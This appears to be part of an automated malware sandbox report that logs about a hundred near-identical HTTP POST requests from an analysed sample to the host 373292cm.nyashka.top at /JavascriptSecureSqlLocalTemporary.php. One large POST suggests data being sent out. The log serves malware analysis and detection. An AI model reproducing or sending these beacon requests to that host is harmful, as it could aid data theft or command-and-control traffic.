                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 1852Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 1872Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 1852Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 1872Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 171160Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 1872Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 1852Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 1872Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 1852Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 1852Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 1872Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 1872Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 1852Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 1852Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
